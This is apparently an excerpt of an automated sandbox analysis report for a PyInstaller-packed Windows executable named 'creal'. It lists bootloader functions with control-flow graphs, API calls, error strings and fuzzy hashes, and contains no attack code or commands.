                                                                                                                                                                                                                • API String ID: 677216364-1384898525
                                                                                                                                                                                                                • Opcode ID: ca1d27e89982189e4f26c07087f6c95fdc921444c9bce541ef2ce41b92843714
                                                                                                                                                                                                                • Instruction ID: 24b13e13cd01dcae684a0f273a9b234f72a205909018c8e801c67f20886cbf10
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca1d27e89982189e4f26c07087f6c95fdc921444c9bce541ef2ce41b92843714
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53517DB3A2860286EB14DF28D45057B77A0EF48F84B554576DA4CC77B9EE3CE480DB44
                                                                                                                                                                                                                Function 00007FF67A601000 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 269COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 266 7ff67a601000-7ff67a6039d6 call 7ff67a610060 call 7ff67a610058 call 7ff67a6087b0 call 7ff67a610058 call 7ff67a60bd60 call 7ff67a6153f0 call 7ff67a615ff8 call 7ff67a601eb0 284 7ff67a603b7f 266->284 285 7ff67a6039dc-7ff67a6039ec call 7ff67a603ed0 266->285 287 7ff67a603b84-7ff67a603ba4 call 7ff67a60bdc0 284->287 285->284 291 7ff67a6039f2-7ff67a603a05 call 7ff67a603da0 285->291 291->284 294 7ff67a603a0b-7ff67a603a32 call 7ff67a607b70 291->294 297 7ff67a603a74-7ff67a603a9c call 7ff67a608050 call 7ff67a601cb0 294->297 298 7ff67a603a34-7ff67a603a43 call 7ff67a607b70 294->298 308 7ff67a603aa2-7ff67a603ab8 call 7ff67a601cb0 297->308 309 7ff67a603b4d-7ff67a603b5e 297->309 298->297 304 7ff67a603a45-7ff67a603a4b 298->304 306 7ff67a603a4d-7ff67a603a55 304->306 307 7ff67a603a57-7ff67a603a71 call 7ff67a61507c call 7ff67a608050 304->307 306->307 307->297 320 7ff67a603aba-7ff67a603ad2 call 7ff67a602b30 308->320 321 7ff67a603ad7-7ff67a603ada 308->321 312 7ff67a603bb2-7ff67a603bb5 309->312 313 7ff67a603b60-7ff67a603b67 309->313 316 7ff67a603bcb-7ff67a603be3 call 7ff67a608be0 312->316 317 7ff67a603bb7-7ff67a603bbd 312->317 313->312 318 7ff67a603b69-7ff67a603b71 call 7ff67a608980 313->318 334 7ff67a603be5-7ff67a603bec 316->334 335 7ff67a603bee-7ff67a603bf5 SetDllDirectoryW 316->335 322 7ff67a603bbf-7ff67a603bc9 317->322 323 7ff67a603bfb-7ff67a603c08 call 7ff67a606df0 317->323 336 7ff67a603ba5-7ff67a603ba8 call 7ff67a6014f0 318->336 337 7ff67a603b73 318->337 320->284 321->309 328 7ff67a603adc-7ff67a603af3 call 7ff67a603fe0 321->328 322->316 322->323 339 7ff67a603c53-7ff67a603c58 call 7ff67a606d70 323->339 340 7ff67a603c0a-7ff67a603c17 call 7ff67a606aa0 323->340 346 7ff67a603af5-7ff67a603af8 328->346 347 7ff67a603afa-7ff67a603b26 call 7ff67a6082c0 328->347 343 7ff67a603b7a call 7ff67a602b30 334->343 335->323 345 7ff67a603bad-7ff67a603bb0 336->345 337->343 350 7ff67a603c5d-7ff67a603c60 339->350 340->339 356 7ff67a603c19-7ff67a603c28 call 7ff67a606600 340->356 343->284 345->284 345->312 352 7ff67a603b35-7ff67a603b4b call 7ff67a602b30 346->352 347->309 359 7ff67a603b28-7ff67a603b30 call 7ff67a61028c 347->359 354 7ff67a603d06-7ff67a603d15 call 7ff67a6034c0 350->354 355 7ff67a603c66-7ff67a603c70 350->355 352->284 354->284 374 7ff67a603d1b-7ff67a603d74 call 7ff67a608950 call 7ff67a607fe0 call 7ff67a607b70 call 7ff67a603620 call 7ff67a608090 call 7ff67a606850 call 7ff67a606d70 354->374 360 7ff67a603c73-7ff67a603c7d 355->360 372 7ff67a603c2a-7ff67a603c36 call 7ff67a606580 356->372 373 7ff67a603c49-7ff67a603c4e call 7ff67a606850 356->373 359->352 365 7ff67a603c7f-7ff67a603c84 360->365 366 7ff67a603c86-7ff67a603c88 360->366 365->360 365->366 370 7ff67a603cd1-7ff67a603d01 call 7ff67a603620 call 7ff67a603460 call 7ff67a603610 call 7ff67a606850 call 7ff67a606d70 366->370 371 7ff67a603c8a-7ff67a603cad call 7ff67a601ef0 366->371 370->287 371->284 384 7ff67a603cb3-7ff67a603cbd 371->384 372->373 385 7ff67a603c38-7ff67a603c47 call 7ff67a606c40 372->385 373->339 409 7ff67a603d82-7ff67a603d85 call 7ff67a601e80 374->409 410 7ff67a603d76-7ff67a603d7d call 7ff67a607d50 374->410 388 7ff67a603cc0-7ff67a603ccf 384->388 385->350 388->370 388->388 413 7ff67a603d8a-7ff67a603d8c 409->413 410->409 413->287
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A603ED0: GetModuleFileNameW.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A603F01
                                                                                                                                                                                                                • SetDllDirectoryW.KERNEL32 ref: 00007FF67A603BF5
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: GetEnvironmentVariableW.KERNEL32(00007FF67A603A1F), ref: 00007FF67A607BAA
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67A607BC7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                • API String ID: 2344891160-1544818733
                                                                                                                                                                                                                • Opcode ID: 9ba03c8df16b21d72729e46afa2357ea2a33f66d8d25b75a636e029e11466fb5
                                                                                                                                                                                                                • Instruction ID: 4c7ad2c53083a0c8cfb30ca6c92c2effce73d6436a9ac1d68911ce9b4ea5d95c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ba03c8df16b21d72729e46afa2357ea2a33f66d8d25b75a636e029e11466fb5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FB18263A3CA8341EA28EB21D550ABF6250FF54F85F4001B5EA4DC76F6EF2CE584A700
                                                                                                                                                                                                                Function 00007FF67A608090 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                • Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                                                                                                                                                • Instruction ID: c927d2e59feedaba654d8bbdd02f66daa53c576af6de9483bee1ffca31dd96b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44414133A28B8285DA20DB24F4552ABB3A4FF94B60F500775E6AD87BE5DF7CD0449B00
                                                                                                                                                                                                                Function 00007FF67A601050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 507 7ff67a601050-7ff67a6010ab call 7ff67a60b5e0 510 7ff67a6010d3-7ff67a6010eb call 7ff67a615090 507->510 511 7ff67a6010ad-7ff67a6010d2 call 7ff67a602b30 507->511 516 7ff67a6010ed-7ff67a601104 call 7ff67a602890 510->516 517 7ff67a601109-7ff67a601119 call 7ff67a615090 510->517 522 7ff67a60126c-7ff67a601281 call 7ff67a60b2c0 call 7ff67a61507c * 2 516->522 523 7ff67a60111b-7ff67a601132 call 7ff67a602890 517->523 524 7ff67a601137-7ff67a601147 517->524 540 7ff67a601286-7ff67a6012a0 522->540 523->522 526 7ff67a601150-7ff67a601175 call 7ff67a6105dc 524->526 534 7ff67a60125e 526->534 535 7ff67a60117b-7ff67a601185 call 7ff67a610350 526->535 538 7ff67a601264 534->538 535->534 541 7ff67a60118b-7ff67a601197 535->541 538->522 542 7ff67a6011a0-7ff67a6011c8 call 7ff67a609a90 541->542 545 7ff67a601241-7ff67a60125c call 7ff67a602b30 542->545 546 7ff67a6011ca-7ff67a6011cd 542->546 545->538 547 7ff67a6011cf-7ff67a6011d9 546->547 548 7ff67a60123c 546->548 550 7ff67a601203-7ff67a601206 547->550 551 7ff67a6011db-7ff67a6011e8 call 7ff67a610d1c 547->551 548->545 553 7ff67a601219-7ff67a60121e 550->553 554 7ff67a601208-7ff67a601216 call 7ff67a60cb40 550->554 558 7ff67a6011ed-7ff67a6011f0 551->558 553->542 557 7ff67a601220-7ff67a601223 553->557 554->553 560 7ff67a601225-7ff67a601228 557->560 561 7ff67a601237-7ff67a60123a 557->561 562 7ff67a6011f2-7ff67a6011fc call 7ff67a610350 558->562 563 7ff67a6011fe-7ff67a601201 558->563 560->545 564 7ff67a60122a-7ff67a601232 560->564 561->538 562->553 562->563 563->545 564->526
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                • Opcode ID: 344160d0c59c7e0824ae8a956d407c8024153e1398207cbd26e900c139b7670f
                                                                                                                                                                                                                • Instruction ID: abe464cdc7a82b6f591d9e62bd724889c1ca207bf0f11968bbe81f0433077626
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 344160d0c59c7e0824ae8a956d407c8024153e1398207cbd26e900c139b7670f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4651DF63A3868285EA20AB51E4507BB6690FF84F94F4441B1EE4DC77E5EF3CE585E700
                                                                                                                                                                                                                Function 00007FF67A61F2D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF67A61F66A,?,?,-00000018,00007FF67A61B417,?,?,?,00007FF67A61B30E,?,?,?,00007FF67A616552), ref: 00007FF67A61F44C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF67A61F66A,?,?,-00000018,00007FF67A61B417,?,?,?,00007FF67A61B30E,?,?,?,00007FF67A616552), ref: 00007FF67A61F458
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                • Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                                                                                                                                • Instruction ID: 64d6928fb8f846369e7b67c2182ee024bd414d3164dcdf568e0b1eba559aa1e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C411223B39A1241FA16CB16E8045B72791BF48FA0F494176DE1DC77A5DF3CE44AA340
                                                                                                                                                                                                                Function 00007FF67A61C11C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 664 7ff67a61c11c-7ff67a61c142 665 7ff67a61c15d-7ff67a61c161 664->665 666 7ff67a61c144-7ff67a61c158 call 7ff67a6155a4 call 7ff67a6155c4 664->666 668 7ff67a61c537-7ff67a61c543 call 7ff67a6155a4 call 7ff67a6155c4 665->668 669 7ff67a61c167-7ff67a61c16e 665->669 682 7ff67a61c54e 666->682 688 7ff67a61c549 call 7ff67a61afa4 668->688 669->668 671 7ff67a61c174-7ff67a61c1a2 669->671 671->668 674 7ff67a61c1a8-7ff67a61c1af 671->674 677 7ff67a61c1c8-7ff67a61c1cb 674->677 678 7ff67a61c1b1-7ff67a61c1c3 call 7ff67a6155a4 call 7ff67a6155c4 674->678 680 7ff67a61c1d1-7ff67a61c1d7 677->680 681 7ff67a61c533-7ff67a61c535 677->681 678->688 680->681 686 7ff67a61c1dd-7ff67a61c1e0 680->686 685 7ff67a61c551-7ff67a61c568 681->685 682->685 686->678 689 7ff67a61c1e2-7ff67a61c207 686->689 688->682 692 7ff67a61c209-7ff67a61c20b 689->692 693 7ff67a61c23a-7ff67a61c241 689->693 695 7ff67a61c20d-7ff67a61c214 692->695 696 7ff67a61c232-7ff67a61c238 692->696 697 7ff67a61c216-7ff67a61c22d call 7ff67a6155a4 call 7ff67a6155c4 call 7ff67a61afa4 693->697 698 7ff67a61c243-7ff67a61c26b call 7ff67a61dcbc call 7ff67a61b00c * 2 693->698 695->696 695->697 701 7ff67a61c2b8-7ff67a61c2cf 696->701 729 7ff67a61c3c0 697->729 725 7ff67a61c288-7ff67a61c2b3 call 7ff67a61c944 698->725 726 7ff67a61c26d-7ff67a61c283 call 7ff67a6155c4 call 7ff67a6155a4 698->726 704 7ff67a61c34a-7ff67a61c354 call 7ff67a62408c 701->704 705 7ff67a61c2d1-7ff67a61c2d9 701->705 717 7ff67a61c35a-7ff67a61c36f 704->717 718 7ff67a61c3de 704->718 705->704 706 7ff67a61c2db-7ff67a61c2dd 705->706 706->704 710 7ff67a61c2df-7ff67a61c2f5 706->710 710->704 714 7ff67a61c2f7-7ff67a61c303 710->714 714->704 719 7ff67a61c305-7ff67a61c307 714->719 717->718 723 7ff67a61c371-7ff67a61c383 GetConsoleMode 717->723 721 7ff67a61c3e3-7ff67a61c403 ReadFile 718->721 719->704 724 7ff67a61c309-7ff67a61c321 719->724 727 7ff67a61c409-7ff67a61c411 721->727 728 7ff67a61c4fd-7ff67a61c506 GetLastError 721->728 723->718 730 7ff67a61c385-7ff67a61c38d 723->730 724->704 734 7ff67a61c323-7ff67a61c32f 724->734 725->701 726->729 727->728 736 7ff67a61c417 727->736 731 7ff67a61c508-7ff67a61c51e call 7ff67a6155c4 call 7ff67a6155a4 728->731 732 7ff67a61c523-7ff67a61c526 728->732 733 7ff67a61c3c3-7ff67a61c3cd call 7ff67a61b00c 729->733 730->721 738 7ff67a61c38f-7ff67a61c3b1 ReadConsoleW 730->738 731->729 742 7ff67a61c3b9-7ff67a61c3bb call 7ff67a615538 732->742 743 7ff67a61c52c-7ff67a61c52e 732->743 733->685 734->704 741 7ff67a61c331-7ff67a61c333 734->741 745 7ff67a61c41e-7ff67a61c433 736->745 747 7ff67a61c3b3 GetLastError 738->747 748 7ff67a61c3d2-7ff67a61c3dc 738->748 741->704 752 7ff67a61c335-7ff67a61c345 741->752 742->729 743->733 745->733 754 7ff67a61c435-7ff67a61c440 745->754 747->742 748->745 752->704 757 7ff67a61c467-7ff67a61c46f 754->757 758 7ff67a61c442-7ff67a61c45b call 7ff67a61bd34 754->758 759 7ff67a61c4eb-7ff67a61c4f8 call 7ff67a61bb74 757->759 760 7ff67a61c471-7ff67a61c483 757->760 766 7ff67a61c460-7ff67a61c462 758->766 759->766 763 7ff67a61c4de-7ff67a61c4e6 760->763 764 7ff67a61c485 760->764 763->733 767 7ff67a61c48a-7ff67a61c491 764->767 766->733 769 7ff67a61c4cd-7ff67a61c4d8 767->769 770 7ff67a61c493-7ff67a61c497 767->770 769->763 771 7ff67a61c499-7ff67a61c4a0 770->771 772 7ff67a61c4b3 770->772 771->772 773 7ff67a61c4a2-7ff67a61c4a6 771->773 774 7ff67a61c4b9-7ff67a61c4c9 772->774 773->772 775 7ff67a61c4a8-7ff67a61c4b1 773->775 774->767 776 7ff67a61c4cb 774->776 775->774 776->763
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 700fa2322a5b373321a2e7ed848750029968f91a5ee85a64e34c26a04be16f04
                                                                                                                                                                                                                • Instruction ID: 3086ae04c5aff46703f530c0fd50c6ff3a33642889c243c7ff4b621d7a5fb9eb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 700fa2322a5b373321a2e7ed848750029968f91a5ee85a64e34c26a04be16f04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DC1EE23A2CB8282EB609B55D0002BF7FA5EB80F80F5541B1DA4E873F1CE7DE855A700
                                                                                                                                                                                                                Function 00007FF67A608660 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                • Opcode ID: 3b4ff29bc97920ba2271d4a1c1e57abe4a5e4b0a83d431c25c67b1407b0ddbe5
                                                                                                                                                                                                                • Instruction ID: b8669f22e29bf6714b52fb5dd439fb9b17c0f6179c2f27b16440eabadf9f1cab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4ff29bc97920ba2271d4a1c1e57abe4a5e4b0a83d431c25c67b1407b0ddbe5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE21413262864282EA11DF55E44457FB7A0FF85FA1F504675DAAC83AF8DF6CE8849700
                                                                                                                                                                                                                Function 00007FF67A608980 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetCurrentProcess.KERNEL32 ref: 00007FF67A608680
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: OpenProcessToken.ADVAPI32 ref: 00007FF67A608691
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetTokenInformation.KERNELBASE ref: 00007FF67A6086B6
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetLastError.KERNEL32 ref: 00007FF67A6086C0
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: GetTokenInformation.KERNELBASE ref: 00007FF67A608700
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF67A60871C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608660: CloseHandle.KERNEL32 ref: 00007FF67A608734
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00007FF67A603B6E), ref: 00007FF67A608A0C
                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF67A608A15
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                                                                                • API String ID: 6828938-1817031585
                                                                                                                                                                                                                • Opcode ID: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                                                                                                                                                                • Instruction ID: b3e804e56951190f6e941bab6c353bbadc56a032df9f0962ccebf29ec7e2cbe4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE215E23A38A4681F610EB20E445AEB7351EF58F81F4401B1EA4DC76F6DE3CE5859240
                                                                                                                                                                                                                Function 00007FF67A61D620 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
